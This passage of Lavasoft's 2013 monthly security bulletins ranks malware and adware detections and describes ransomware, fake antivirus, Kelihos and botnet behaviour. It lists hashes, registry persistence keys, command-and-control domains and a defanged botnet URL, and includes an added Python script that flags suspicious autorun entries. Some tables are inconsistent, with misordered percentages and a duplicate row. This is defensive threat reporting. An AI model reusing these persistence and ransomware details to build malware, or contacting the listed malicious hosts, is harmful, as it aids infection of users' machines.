--- | --- | --- | ---
1 | MyWebSearch | 26.24% | +6.12%
2 | Adware.Linkury | 14.95% | -4.84%
3 | Win32.Toolbar.Iminent | 8.43% | -2.15%
4 | Win32.PUP.Bandoo | 7.84% | +1.29%
5 | SweetIM | 4.56% | -1.87%
6 | Iminent | 4.51% | -6.07%
7 | Bprotector | 3.18% | -0.93%
8 | InstallCore | 2.26% | -0.02%
9 | Yontoo | 2.17% | -0.98%
10 | Babylon | 1.70% | -0.13%
11 | Artua Vladislav | 1.35% | -0.19%
12 | InstallBrain | 1.34% | -0.01%
13 | Win32.Adware.ShopAtHome | 1.29% | +0.40%
14 | Wajam | 1.27% | -0.01%
15 | DownloadMR | 1.22% | +0.07%
16 | CoolMirage Ltd | 1.05% | -0.01%
17 | DomaIQ | 1.00% | -1.18%
18 | Optimum Installer | 0.88% | +0.07%
19 | Win32.Toolbar.Mediabar | 0.78% | -0.03%
20 | GamePlayLabs | 0.75% | -0.38%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin: August 2013

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Win32.Trojan.Agent | 30.04% | +0.13%
2 | Trojan.Win32.Generic!BT | 25.85% | +1.35%
3 | Email-Worm.Win32.Brontok.a | 3.79% | new
4 | Trojan.Win32.Generic.pak!cobra | 2.90% | +0.79%
5 | Virus.Win32.Sality.at | 1.27% | -1.38%
6 | Malware.JS.Generic | 1.22% | -0.77%
7 | HackTool.Win32.Keygen | 1.14% | +0.04%
8 | Virus.Win32.Ramnit.b | 1.00% | -0.06%
9 | Trojan.Win32.Gframe | 0.66% | new
10 | Virus.Win32.Neshta.a | 0.58% | -0.62%
11 | Worm.Win32.Pykspa | 0.50% | new
12 | Heur.HTML.MalIFrame | 0.38% | +0.06%
13 | Virus.Win32.Sality.ah | 0.38% | -0.49%
14 | Trojan.Win32.Jpgiframe | 0.36% | +0.02%
15 | Trojan.Win32.Generic!SB.0 | 0.28% | -0.15%
16 | Trojan.Win32.Clicker!BT | 0.27% | new
17 | Trojan.Win32.Sirefef.bb | 0.27% | new
18 | INF.Autorun | 0.24% | -2.72%
19 | Trojan-Clicker.HTML.Iframe | 0.24% | new
20 | Trojan.Win32.Startpage.or | 0.22% | new

The Top 20 malicious programs blocked on PCs

August sees new detections in the Top 20. Email-Worm.Win32.Brontok.a and Worm.Win32.Pykspa return to the prevalence list, having last been seen in June 2013 and April 2013 respectively, and Trojan.Win32.Gframe, a detection for malicious IFrames embedded in GIF files, appears at position nine.

Trojan.Win32.Gframe (MD5: ffd89e57a371bec38a249354be8fff0e)

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Trojan.Win32.Generic!BT | 35.47% | -0.75%
2 | Trojan.Win32.Generic.pak!cobra | 4.76% | +0.18%
3 | Virus.Win32.Expiro.bc | 4.07% | +0.89%
4 | Trojan-Downloader.Win32.LoadMoney.u | 4.06% | new
5 | Virus.Win32.Virut.ce | 2.90% | +2.13%
6 | Worm.Win32.Gamarue.aa | 1.26% | +0.88%
7 | Trojan.Win32.Desini.a | 1.00% | new
8 | Malware.JS.Generic | 0.99% | +0.68%
9 | Trojan-Dropper.Win32.Gepys.a | 0.85% | +0.04%
10 | Trojan.Win32.Generic!SB.0 | 0.81% | -0.25%
11 | Win32.Malware!Drop | 0.77% | +0.29%
12 | Trojan.Win32.Runner.a | 0.71% | new
13 | Trojan.Win32.Dwnldr.y | 0.66% | +0.38%
14 | FraudTool.Win32.FakeRean | 0.65% | +0.26%
15 | Trojan.Win32.PSW.gz | 0.61% | -0.37%
16 | Trojan.JS.Obfuscator.aa | 0.55% | -0.04%
17 | Trojan.Win32.Reveton.a | 0.51% | new
18 | Trojan.Win32.Vobfus.paa | 0.45% | +0.03%
19 | TrojanPWS.Win32.OnLineGames.ahj | 0.43% | +0.13%
20 | Worm.Win32.Mabezat.b | 0.37% | +0.10%

New malicious programs entered the Top 20

Fake antiviruses holding machines to ransom until a fee is paid to unlock their computers continue to blight users. In August, our systems detected the following fake antiviruses:

Fake AV (MD5: 54828dd3e11fc1b5401745bdb5ae4251) is detected by Ad-Aware as Trojan.Win32.Reveton.a

Fake AV (MD5: 8ca5e580c60e66d4c87f9aa408946fc3) is detected by Ad-Aware as Trojan.Win32.Generic!BT

Fake AV (MD5: f83ca10a393ec4759202c077d63c3a20) is detected by Ad-Aware as FraudTool.Win32.FakeAV.hdd

Another prevalent class of malware is ransomware. This month we discovered a new take on the ransom tactic, called “PRISM locker”. It tricks users by showing popups, supposedly from the “NSA”, claiming they have been caught downloading and distributing illegal content, forcing the victim to pay a fine of $300 to unlock the computer.

PRISM locker (MD5: e1988e7512bb18dc0e3ed946ca466d0f) is detected by Ad-Aware as Trojan.Win32.Generic

Once launched, the Trojan adds an entry to the registry Run key, ensuring the infected computer will be locked again at the next system start-up:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"internat.exe"

You can find more details about that malware here.

New Features of Kelihos

Recently we published a report on Kelihos Update, where we presented new app targets and installation features in the backdoor. The paper also revealed that the botnet was still in operation and all six job servers were up and running.

Thanks to VirusTotal we can see several cached requests to the Kelihos job server:

The most remarkable change was in the installation procedure. Previous versions added “SonyAgent” values in a system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SonyAgent"=""
[HKCU\Software\Sony]
"SonyID"="DCmkXuRtjruvB1iHVBkEJlW2S+BimFp/lF4WuQjFyUZiEEBn51H4u+8OsvFwcsEfxA=="
"SonyID1"=dword:00000050
"SonyID2"=hex:00,00,00,00,00,00,00,00
"SonyID3"= (data_in_hex)

This time it uses randomization for registry entries and filenames, which complicates recognizing the infection for an ordinary user. The backdoor tries to mimic names of system files and services:

Kelihos uses random names from the list when spreading via removable drives by creating its copies and lnk files:

X:\{password, screensaver, click, installer, hentai, run, porn, game}.exe
X:\Shortcut to %file name from the list%.lnk

The additional dummy user-agents are used to avoid blocking http connections. The number of fake agents increased from 28 to 47 since March.
There are new incomings among targeted applications where the backdoor looks for user credentials as well:

Cyberduck, FreshFTP, FTPShell, Global Downloader, Notepad++, TFTPInfo, MyFTP, Sherrod, NovaFTP, CoolNovo

We scanned the fast-flux network for "ditojtap.ru" again and harvested 4543 IP addresses that help deliver updates to zombie computers.

It looks pretty similar to the map built for 6244 proxy-bots in March:

Both maps reveal that Ukraine is the most affected country, with 47% of the infected computers in the botnet's fast-flux network.
VirusTotal cached some of the DNS requests:

The main finding is that the botnet is still in operation despite all attempts to take it down. You can find a description of the latest downloaded sample in our Malware Encyclopedia.
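The bulletins above point at the same persistence spots several times: the "Audio Drivers" value the Dropbox-hosted lock screen writes under the HKCU Run key, the "internat.exe" value the PRISM locker adds, the AppInit_DLLs entry Trojan-Dropper.Win32.Gepys.a abuses, and the "SonyAgent" value that older Kelihos builds left under HKLM Run. The script below is an added example, not Lavasoft's or the bulletin's code: it parses a `.reg` export of those keys and flags entries on two grounds, a value name that matches one of the families named here, and (my own heuristic, not the bulletin's) an autorun that starts something from a user-profile directory, which is where these samples were found to live. The second test is what still fires once a family randomizes its names, as the Kelihos section says the current builds do. The `SAMPLE_REG` export is constructed: the user name, paths and the DLL name are made up, while the key paths and value names are the ones the bulletins report.

```python
import re

# Persistence locations quoted in the bulletins, normalized to lower case with
# the hive written out (HKCU/HKLM abbreviations are expanded on parse).
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}
APPINIT_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\windows"
HIVES = {"hkcu": "hkey_current_user", "hklm": "hkey_local_machine"}

# Run-key value names the bulletins tie to specific families.
KNOWN_VALUE_NAMES = {
    "audio drivers": "Dropbox-hosted lock-screen ransomware (Trojan.Win32.Generic!BT)",
    "internat.exe": "PRISM locker",
    "sonyagent": "Kelihos (builds before name randomization)",
}
# Heuristic (mine, not the bulletin's): autoruns pointing into a user profile
# deserve a look, because that is where these samples were dropped.
PROFILE_MARKERS = ("%appdata%", "%application data%", "\\appdata\\", "\\application data\\")


def normalize_key(key: str) -> str:
    hive, _, rest = key.partition("\\")
    return HIVES.get(hive.lower(), hive.lower()) + "\\" + rest.lower()


def parse_value(raw: str):
    """Decode one .reg value: quoted string, dword:, or single-line hex:."""
    if raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])     # undo \\ and \" escapes
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex:"):
        return bytes.fromhex(raw[4:].replace(",", ""))
    return raw


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {normalized_key: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = normalize_key(line[1:-1])
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            keys[current][name] = parse_value(m.group(2))
    return keys


def audit_autoruns(keys: dict) -> list:
    """One finding per suspicious value: {key, name, data, reasons}."""
    findings = []
    for key, values in keys.items():
        for name, data in values.items():
            reasons, text = [], str(data).lower()
            if key in RUN_KEYS:
                if name.lower() in KNOWN_VALUE_NAMES:
                    reasons.append("value name matches " + KNOWN_VALUE_NAMES[name.lower()])
                if any(marker in text for marker in PROFILE_MARKERS):
                    reasons.append("starts a file from a user-profile directory (heuristic, verify the file)")
            elif key == APPINIT_KEY and name.lower() == "appinit_dlls" and text.strip():
                reasons.append("AppInit_DLLs loads this DLL into every process (Trojan-Dropper.Win32.Gepys.a technique)")
            if reasons:
                findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings


# Constructed sample export: user name, paths and DLL name are made up; the
# key paths and value names are those the bulletins report.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Audio Drivers"="C:\\Users\\alice\\AppData\\Roaming\\visfx.exe"
"internat.exe"="C:\\Users\\alice\\AppData\\Roaming\\internat.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SonyAgent"=""
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Documents and Settings\\All Users\\Application Data\\Mozilla\\qfkzwm.dll"
"LoadAppInit_DLLs"=dword:00000001
"""

if __name__ == "__main__":
    for f in audit_autoruns(parse_reg(SAMPLE_REG)):
        print(f"[{f['key']}] {f['name']!r} = {f['data']!r}")
        for r in f["reasons"]:
            print("    -", r)
```

On the constructed export this flags "Audio Drivers", "internat.exe" and "SonyAgent" by name, the AppInit_DLLs entry by location, and also the legitimate OneDrive autorun through the profile-directory heuristic while leaving the system32 entry alone. That last false positive is deliberate: the heuristic is a triage filter that tells an analyst which autoruns to hash and look up, not a verdict. The parser handles one-line values only; multi-line `hex:` continuations would need the backslash-continued lines joined first.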

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | MyWebSearch | 4.54% | -21.70%
2 | Adware.Linkury | 1.52% | -13.43%
3 | Win32.PUP.Bandoo | 1.33% | -6.51%
4 | Win32.Toolbar.Iminent | 1.06% | -7.37%
5 | Iminent | 0.49% | -7.94%
6 | Bprotector | 0.42% | -2.76%
7 | SweetIM | 0.40% | -4.16%
8 | InstallCore | 0.37% | -1.89%
9 | Yontoo | 0.25% | -1.92%
10 | Win32.Adware.ShopAtHome | 0.22% | -1.07%
11 | Wajam | 0.19% | -1.08%
12 | CoolMirage Ltd | 0.18% | -0.87%
13 | ExpressFiles Installer | 0.17% | new
14 | DownloadMR | 0.16% | -1.06%
15 | AirInstaller | 0.16% | new
16 | Artua Vladislav | 0.15% | -1.20%
17 | Babylon | 0.15% | -1.55%
18 | DomaIQ | 0.14% | -0.86%
19 | InstallBrain | 0.13% | -1.21%
20 | Win32.Toolbar.Mediabar | 0.13% | -0.65%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.


Lavasoft Security Bulletin: September 2013

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Win32.Trojan.Agent | 35.61% | +5.57%
2 | Trojan.Win32.Generic!BT | 23.27% | -2.58%
3 | Trojan.Win32.Generic.pak!cobra | 3.89% | +0.99%
4 | Trojan.Win32.Ramnit.c | 2.70% | new
5 | Malware.JS.Generic | 2.59% | +1.37%
6 | Trojan.Win32.Reveton.a | 1.98% | new
7 | Virus.Win32.Sality.ah | 1.81% | +1.43%
8 | Trojan-Dropper.Win32.Agent | 1.24% | new
9 | Virus.VBS.Ramnit.a | 1.20% | new
10 | Email-Worm.Win32.Brontok.a | 1.19% | -2.60%
11 | HackTool.Win32.Keygen | 1.14% | 0.00%
12 | Trojan.Win32.Generic!SB.0 | 1.10% | +0.82%
13 | Trojan.Win32.Jpgiframe | 0.95% | +0.59%
14 | Virus.Win32.Sality.at | 0.92% | -0.35%
15 | Trojan.WinNT.Conficker.b | 0.87% | new
16 | Worm.Win32.Morto.ab | 0.78% | new
17 | Virus.Win32.Expiro.gen.a | 0.61% | new
18 | Worm.Win32.Pykspa | 0.55% | +0.05%
19 | Virus.Win32.Ramnit.b | 0.54% | -0.46%
20 | Heur.HTML.MalIFrame | 0.52% | +0.14%

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - September 2013

Let’s review and consider information on the most prevalent families detected in September.

Position | Family | % of all threats | Change in ranking
--- | --- | --- | ---
1 | Trojan.Win32.Generic!BT | 35.22% | -0.25%
2 | Trojan.Win32.Generic.pak!cobra | 4.98% | +0.22%
3 | Trojan-Downloader.Win32.LoadMoney.u | 8.78% | +4.72%
4 | Worm.Win32.Gamarue.z | 5.59% | new
5 | Virus.Win32.Expiro.bc | 3.36% | -0.71%
6 | Virus.Win32.Virut.ce | 2.17% | -0.73%
7 | Trojan.Win32.Generic!SB.0 | 1.55% | +0.74%
8 | Malware.JS.Generic | 1.15% | +0.16%
9 | Trojan.Win32.Dwnldr.y | 1.13% | +0.47%
10 | Trojan.Win32.Desini.a | 0.87% | -0.13%
11 | Trojan.Win32.Kryptik.acsn | 0.96% | new
12 | Worm.Win32.Mabezat.b | 0.85% | +0.48%
13 | Trojan-Dropper.Win32.Gepys.a | 0.76% | -0.09%
14 | Trojan.Win32.Runner.a | 0.79% | +0.08%
15 | Win32.Malware!Drop | 0.71% | -0.06%
16 | Trojan.JS.Obfuscator.aa | 0.66% | +0.11%
17 | Trojan.Win32.PSW.gz | 0.49% | -0.12%
18 | FraudTool.Win32.FakeRean | 0.65% | 0.00%
19 | TrojanPWS.Win32.OnLineGames.ahj | 0.42% | -0.01%
20 | Trojan.Win32.Vobfus.paa | 0.37% | -0.08%

New malicious programs entered the Top 20

September sees new Fake-AV interfaces that supposedly detect hidden threats on a user’s computer.

Fake AV (MD5: cc2fedff4406e3f620b84983057fabbb) is detected by Ad-Aware as Trojan.Win32.Kryptik.acsn

Ransomware continues to blight users, blocking computers and encrypting private data. Lavasoft recently discovered an undetected crypto locker titled "Anti-Child Porn Protection" that encrypts the user's data and demands a ransom to decrypt it. As stated in the locker's notification window, the ransomware uses AES-256, an unbreakable cipher. Brute-forcing is not practical, as it would need to cover 1.1 × 10^77 combinations and take 3.31 × 10^56 years (EETimes); nor do recovery tools that restore erased original files help, as they did in the case of GpCode.ak, which used RSA-1024.

Ransomware (MD5:0b06eb1ed254790e38d7b5accc0fe072) is detected by Ad-Aware as Trojan.Win32.Generic

It is worth noting that this ransomware was created in October 2012, and since that date we see no detections on the VirusTotal multi-scanner. It is detected by Ad-Aware Antivirus as Trojan.Win32.Generic and described in the Malware Encyclopedia.

Bots Review

Table 1: Bots under analysis (September 2013, Lavasoft MAS).

Bot nameAliases*CountAutorunWindows Services
Modification
Anti-AV/
Anti-Analysis
PropagationCommunication ProtocolRootkit ActivityNetwork Activity/ UpdatesConnected Domains
ZbotZeus, Trojan.Win32.Zbot(VIPRE), Trojan-PSW.Win32.Tepfer(Ikarus),
PWS:Win32/Zbot(Microsoft), Win32:Zbot(Avast), Trojan.Zbot(Symantec),
PWS-Zbot(McAfee)
479yes*Noneno/noRemovable drives, Email,
Drive-by infection
HTTP30-52 user-mode hooks in 6
libraries
yes/yesgoogle.com, google.ca, kgv-weser.com, thenatemiller.co, streetviewdaz.com, ninjamakeresjulakihsyrias.com, microsoftinternetsafety.net, akamai.net, ftp.brickwallmgmt.com, screaminpeach.com, solutioncorp.com, mastergrp-spb.ru, golfpark-moossee.ch, chocolatecovers.com, automa.it, goodvaluecenter.com, nuritech.com, brookfarm.com.au, fraser-high.school.nz, pixemia.com, mattiussiecologia.com, bocr.cz, austriansurfing.at, bocr.cz, d4drmedia.com, 4pipp.com, bocr.cz/bocr, ricated.com, easygen.com, re-wakefield.co.uk, robertmcintyre.com.au, tessera.co.jp, telenavis.com, thedonaldsongroup.com, hinnenwiese.de, kamaruka.vic.edu.au, digpro.se, fabianonline.de, empordalia.com, yamamoto-sr.com, fruitspot.co.za, shipeliteexpress.com, stepnet.de, biurimex.pl, tavdi.com, padstow.com, youjoomla.com, upsilon89.com, gjk.com.pl, sigmametalsinc.com, thesergery.com, sigmaaero.com, structives.org, agence-des-druides.com, buzzkillmedia.com, sspackaginggroup.com, perc.ca, pbna.com, leadershipforum.us, kafrit.com, theautospas.com, photoclubs.com, rea-soft.ru, graceweb.net, ctr4process.org, altonhousehotel.com
CycbotBKDR_CYCBOT (TrendMicro),
Backdoor.Win32.Cycbot(VIPRE), Backdoor.Win32.Cycbot(Ikarus, Emsisoft),
BackDoor.Gbot(DrWeb), Backdoor:Win32/Cycbot(Microsoft), Win32:Cybota(Avast),
Backdoor.Cycbot(Symantec)
77yes*Disables wscsvcno/noUsing other malwareHTTPNoneyes/yesakamai.net, akamaiedge.net, newworldorderreport.com, parkingcrew.net, google.com, google.ca, remindmeroster.com, TRANSERSDATAFORME.COM, cloudstorepro.com, suras-ip.com, webnode.com, binghamtonschools.org, yordatazone.com, firoli-sys.com, windowsupdate.com, alleducationalsoftware.com
KelihosBackdoor.Win32.Kelihos(Vipre),
Backdoor:Win32/Kelihos(Microsoft), BackDoor.Slym(DrWeb), Kelihos (Norman)
629yes*Noneno/noRemovable drivesHTTP19 user-mode hooks in 6
libraries
yes/yesamazonaws.com, ivynvov.net, qikizny.net, taanrif.net, azawvos.com, asjoros.biz (mostly Ips were used)
NrgBot/DorkbotTSPY_DORKBOT(TrendMicro),
Worm.Win32.Dorkbot(VIPRE), BackDoor.IRC.NgrBot(DrWeb), Worm:Win32/Dorkbot(Microsoft), Trojan.Win32.Cidox(Kaspersky)
252yes*Noneyes/yesRemovable drives, Social
Networks, MSN Messenger, IRC
IRC17 user-mode hooks in 5
libraries
yes/yes
hotmail.com, api.wipmania.com, k211128.com, k211130.com, jaao20222.com, jo1aa28.com, jo1aa23.com, jossven.com, lartinito.com, balkoov.com, tsroxybaa.com, baerr000.ru, joerv06.com, cae1r699.ru, jo1rv99.com
BlazebotBackdoor:Win32/IRCbot,
Worm:Win32/Neeris(Microsoft)
5yes*Enable RDPno/noRemovable drives, MSN
Messenger, Filesharing (Dropbox)
IRCNoneyes/yesdropbox.com, dropboxusercontent.com, whatismyip.com, checkip.dyndns.com, p0rn-lover.us, pool-x.eu
ShizBackdoor.Win32.Shiz(Ikarus),
TROJ_SHIZ(TrendMicro), PWS:Win32/Simda (Microsoft), Trojan.PWS.Ibank (DrWeb),
Win32:Shiz(Avast), Infostealer.Shiz(Symantec)
10yes**Noneyes/yesUsing other malwareHTTP23 user mode hooks in 6
libraries
yes/yeskefuwidijyp.eu (mostly IP addresses were used)

Aliases*: Generic verdicts were not included.
Autorun: yes*: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
Autorun: yes**: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run], [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

Bot distribution in September:

Autorun
All the bots analysed use the “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” registry key to launch themselves when Windows boots. The Shiz backdoor also uses “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon” in a further attempt to survive a reboot.


DorkBot and Shiz block AV websites, preventing users from downloading the latest updates. A recent Dorkbot block list contains 1258 URLs and can be downloaded from one of the bots: hxxp://146.185.237.111/va.txt (also available from our mirror).

Additionally, Shiz and DorkBot use server-side polymorphism to avoid detection.

Recently we found many references on the Internet stating that Kelihos supposedly checks whether a victim’s IP is on online blacklists (CBL, composite block list). This information was published by ZScaler Lab and referenced by ThreatPost and hundreds of other news sites.

Unfortunately, we could neither find CBL requests in our database nor reproduce such behavior on the Kelihos sample used by ZScaler (fbad0969a3fe539fa048df9912b8c6d4). In addition, Kelihos uses the HTTP protocol to communicate with peers, not SMTP as ZScaler noted. The SMTP traffic highlighted by the ZScaler researcher can be explained by spambot activity, which implies numerous connections to SMTP servers. It is possible that the analysts mistakenly attributed blocking replies from SMTP servers to the Kelihos protocol.

SMTP traffic generated by mail servers when Kelihos sends spam

Self-Propagation
The bots can propagate via removable drives (Kelihos uses a vulnerability in LNK files), social networks (DorkBot), instant messengers (Dorkbot, Blazebot) and file-sharing services such as Dropbox (Blazebot together with Rbot). Drive-by attacks and downloading by other malware are also used to deliver a backdoor.

Communication Protocols
HTTP and IRC are the most commonly used protocols nowadays. We noticed that the IRC bots Dorkbot, Blazebot and Rbot operate together and are probably owned by the same botmaster.

Bot distribution by the type of communication protocol

Rootkit Activity
Four of the six bots (Zbot, Kelihos, DorkBot, Shiz) install user-mode hooks into Windows system DLLs in order to spy on users’ activity. Zbot installs the highest number of hooks.

Network Activity
All the reviewed bots are still alive, showing network activity and downloading updates.

According to last month’s network activity, Kelihos and Dorkbot were using Amazon’s cloud service to host malicious files. In September we found eighty-eight malicious samples that connected to compute.amazonaws.com for bot updates.

The first such connections made by Kelihos were detected in June 2013 and their number continues to grow; it would appear that Amazon’s cloud is becoming popular among botmasters as a way to grow their botnets.

Amazon Web Services

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on users’ PCs. These are advertising software, browser toolbars, search engines and other programs that change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 36.41% | new
2 | Adware.JS.Conduit | 17.14% | new
3 | MyWebSearch | 14.70% | +10.16%
4 | Win32.PUP.Bandoo | 4.93% | +3.60%
5 | Adware.Linkury | 4.48% | +2.96%
6 | Win32.Toolbar.Iminent | 3.51% | +2.45%
7 | Babylon | 1.93% | +1.78%
8 | Iminent | 1.19% | +0.13%
9 | SweetIM | 1.12% | +0.72%
10 | Yontoo | 0.83% | +0.58%
11 | InstallBrain | 0.83% | +0.70%
12 | Bprotector | 0.80% | +0.38%
13 | Crossrider | 0.78% | new
14 | InstallCore | 0.76% | +0.39%
15 | Win32.Adware.ShopAtHome | 0.57% | +0.35%
16 | DownloadMR | 0.49% | +0.33%
17 | Yontoo | 0.45% | +0.20%
18 | Amonetize | 0.45% | new
19 | Installerex/WebPick | 0.44% | new
20 | Elex Installer | 0.43% | new

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin: October 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 36.59% | +0.98%
2 | Trojan.Win32.Generic!BT | 27.90% | +4.63%
3 | Trojan.Win32.Generic!SB.0 | 3.48% | +2.38%
4 | Virus.Win32.Sality.ah | 1.30% | -0.51%
5 | Trojan.Win32.Ramnit.c | 1.18% | -1.52%
6 | Malware.JS.Generic | 1.01% | -1.58%
7 | Trojan.Win32.Generic.pak!cobra | 0.96% | -2.93%
8 | Trojan-Dropper.Win32.Agent | 0.94% | -0.30%
9 | Trojan-Downloader.Win32.Banload.ayqh | 0.88% | new
10 | HackTool.Win32.Keygen | 0.69% | -0.45%
11 | Virus.VBS.Ramnit.a | 0.65% | -0.55%
12 | Virus.Win32.Ramnit.a | 0.57% | new
13 | Trojan.Win32.Jpgiframe | 0.43% | -0.52%
14 | Virus.Win32.Sality.bh | 0.43% | new
15 | Virus.Win32.Ramnit.b | 0.42% | -0.12%
16 | Win32.Parite.b | 0.33% | new
17 | Virus.Win32.Jadtre.b | 0.31% | new
18 | Trojan.Win64.Sirefef.ca | 0.31% | new
19 | Virus.Win32.Sality.at | 0.26% | -0.66%
20 | Email-Worm.Win32.Brontok.a | 0.25% | -0.94%

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - October 2013

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 36.86% | +1.64%
2 | Trojan-Downloader.Win32.LoadMoney.u | 11.88% | +3.10%
3 | Worm.Win32.Gamarue.z | 6.00% | +0.41%
4 | Trojan.Win32.Generic.pak!cobra | 5.82% | +0.84%
5 | Virus.Win32.Virut.ce | 2.26% | +0.09%
6 | Trojan.Win32.Generic!SB.0 | 2.14% | +0.59%
7 | Virus.Win32.Expiro.gen | 1.97% | new
8 | Malware.JS.Generic | 1.28% | +0.13%
9 | Worm.Win32.Gamarue.af | 1.26% | new
10 | Trojan.Win32.Kryptik.acsn | 1.00% | +0.04%
11 | Win32.Malware!Drop | 0.81% | +0.10%
12 | Trojan.Win32.Desini.a | 0.75% | -0.12%
13 | Trojan-Dropper.Win32.Gepys.a | 0.75% | -0.01%
14 | Trojan.JS.Obfuscator.aa | 0.68% | +0.02%
15 | FraudTool.Win32.FakeRean | 0.63% | -0.02%
16 | Trojan.Win32.DotNet.c | 0.61% | new
17 | Trojan.Win32.Runner.a | 0.58% | -0.21%
18 | Trojan.StartPage | 0.56% | new
19 | Trojan.Win32.Vobfus.paa | 0.51% | +0.14%
20 | TrojanPWS.Win32.OnLineGames.ahj | 0.46% | +0.04%

New malicious programs entered the Top 20

A new Fake-AV interface that falsely claims to detect hidden threats on a user’s computer was discovered in the wild in October. It is detected by twelve of the forty-eight antivirus engines on VirusTotal.

Fake AV (MD5: a3ed09d61f7622ec506e12f967ae06ba) is detected by Ad-Aware as Gen:Variant.Strictor.4450

Virustotal detects MD5: a3ed09d61f7622ec506e12f967ae06ba

Ransomware infections are on the rise. A new variant claims that local law enforcement or government organisations have blocked the affected computer. The new blocker determines the country from the victim’s IP address and shows a corresponding message in order to make the scam seem legitimate. This threat is detected by fifteen of the forty-eight antivirus engines on VirusTotal.

Ransomware: (MD5: f6d63190089664f276b65a7c3baf8aa0) is detected by Ad-Aware as Trojan.Generic

Virustotal detects for MD5: f6d63190089664f276b65a7c3baf8aa0

AlienVault Lab recently announced that new ransomware variants now demand BitCoins to unlock a computer.

The crypto blocker (MD5: 012d9088558072bc3103ab5da39ddd54), detected by Microsoft as Trojan:Win32/Crilock.A, demands payment via MoneyPak (USA only), Ukash, cashU or Bitcoin, making it harder to trace the attacker. As usual, the crypto locker tries to intimidate the victim with the details of the encryption used, naming the algorithm and its unbreakable key length (RSA-2048) and referencing Wikipedia. The program uses the standard Microsoft Enhanced Cryptographic Provider v1.0.
To run itself automatically each time Windows boots, the blocker adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CryptoLocker" = "%Documents and Settings%\%user%\Application Data\{D0EE94E5-EF8C-E6CC-8E83-EFF5CFCD2F14}.exe"

The malware tries to connect to its C&C server, located via a DGA (Domain Generation Algorithm), to obtain the RSA public key used for encryption:

The C&C server is not currently reachable and some of the domains are sinkholed:

Once the key is received from the C&C server, the malware starts looking for files with the following extensions in order to encrypt them:

*.odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.eps, *.indd, *.cdr, img_*.jpg, *.dng, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.ptx, *.pef, *.srw, *.der, *.cer, *.crt, *.pem, *.pfx

To get the private key the user must pay $300 within a limited time (72 hours), after which the key will be deleted. If incorrect information is entered, the locker halves the time remaining before the private key is destroyed.

This is yet another example of ransomware that has started demanding ransoms be paid in Bitcoin, making the transactions anonymous and, for all intents and purposes, impossible to trace.

Bots Review

Table: Bots under analysis (October 2013, Lavasoft MAS).


Bot's name | September count | October count | Change
Zbot | 479 | 505 | 1.6%
